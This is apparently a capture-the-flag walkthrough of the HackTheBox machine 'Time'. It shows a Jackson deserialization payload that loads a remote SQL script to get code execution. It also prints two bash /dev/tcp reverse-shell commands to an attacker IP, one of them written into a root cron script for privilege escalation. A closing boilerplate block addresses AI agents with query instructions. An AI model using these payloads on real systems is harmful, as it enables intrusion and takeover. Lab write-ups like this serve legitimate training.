# HTB: Time β Deserialization, Java Shenanigans & Root in Style
{% hint style="info" %}
*This medium-difficulty HTB box was a great lesson in one thing:*\
**Read the damn error. Then research it like your shell depends on it.**
{% endhint %}
### π§ Enumeration
#### π Nmap Scan
As always, I began with a full enumeration sweep:
```
nmap -Pn -n -A --reason -vvv -oN nmap/00-basic.txt -iL target.txt
```
**Findings:**
* **Port 22**: OpenSSH 8.2p1 (Ubuntu)
* **Port 80**: Apache 2.4.41 hosting a web server titled *"Online JSON Parser"*
### πΈ Recon
The website was a **JSON beautifier** β harmless-looking, but CTFs donβt give you port 80 unless they want you to do *evil developer things*.
I ran `hakrawler` to check for juicy endpoints:
```
cat url.txt | hakrawler -proxy http://localhost:8080 -subs -d 5 -insecure -s -json >hakrawler.json
```
No admin panel. No hidden paths. But what caught my eye was how it **handled malformed JSON**...
### π₯ Exploitation β Jackson Deserialization RCE
Normal JSON works:
```
{"test":"hello"}
```
But malformed input returned this beauty:
> `Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException`
> *Expected START\_ARRAY, got START\_OBJECTβ¦*\
> \&#xNAN;*"need JSON Array to contain As.WRAPPER\_ARRAY type information..."*
**Boom. Jackpot.**\
Thatβs **Jackson Deserialization**.
I dug into this article that became my savior:\
π
#### π§ͺ Payload Time
```
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.8:8000/inject.sql'"}]
```
* π `inject.sql` β Weaponized
```
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.8/4444 0>&1')
```
```
nc -lvnp 4444
```
π₯ **Reverse shell obtained!**
### π§ Local Privilege Escalation β Timer Shenanigans
After running `linpeas`, I found something gold:
* /usr/bin/timer\_backup.sh run as root every 10 seconds
```
echo "bash -i >& /dev/tcp/10.10.14.8/9000 0>&1" > /usr/bin/timer_backup.sh
```
```
nc -lvnp 9000
```
π Got root. Simple, clean, and elegant.
{% embed url="" %}
## References
*
*
*
*
*
## π§ Final Thoughts
What made **HTB: Time** stand out wasnβt the difficulty of the exploit. It was the **importance of interpreting Java errors and knowing what to Google.**
β‘οΈ *Lesson:* Sometimes the error **is** the clue.
This box was a smooth ride with:
* π Deep Java debugging
* 𧬠Deserialization abuse
* π Scheduled script escalation
And that's a wrap! Time box β rooted. β
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.wehost.co.in/ctf-walkthrough/htb-time-deserialization-java-shenanigans-and-root-in-style.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.